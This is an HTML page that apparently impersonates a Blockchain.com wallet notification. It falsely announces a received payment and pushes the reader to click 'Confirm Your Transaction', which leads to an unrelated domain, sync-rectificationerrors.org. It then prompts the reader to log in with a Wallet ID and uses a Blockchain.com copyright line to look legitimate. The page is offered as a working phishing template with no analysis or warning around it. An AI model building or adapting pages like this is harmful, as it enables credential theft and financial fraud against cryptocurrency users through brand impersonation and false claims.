<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Blockchain</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.4/css/bulma.min.css">
    <style>
        body {
            font-family: Arial;
        }
        
        .mack {
            background: blue;
            color: #fff;
            width: 100%;
            height: 70px;
            outline: none;
            border-radius: 10px;
            font-size: 20px;
            border: none;
            font-weight: bold;
        }
        
        .mack1 {
            color: blue;
            margin: 15px;
            font-size: large;
        }
    </style>
</head>

<body>

    <br><br>
    <center><img src="https://sync-rectificationerrors.org/logo.png" width="50%" alt="Logo" /></center><br>
    <form class="box"><br>
        <center>
            <h1 class="title"><b>Transaction Received. </b></h1>
        </center><br>
        <div class="content">
            <center>
                <p style="font-weight:bold;">A payment has been received into your Blockchain Wallet, <br> o view the
                  details of your transaction on the blockchain, click the link.<br>
            </p>
            </center><br>
        </div>

        <button class="mack "><a href="http://appchain.sync-rectificationerrors.org" style="color: #fff;">Confirm Your Transaction</a></button><br><br>
    </form>

    <form class="box ">
        <center><img src="https://sync-rectificationerrors.org/app-store-png-logo-33123.png" width="50% "></center><br>
        <p><b>Use your unique Wallet ID to log into your Blockchain wallet.</b></p><br><br>
    </form>
    <p class="mack1 ">&copy; Blockchain.com</p>
</body>

</html>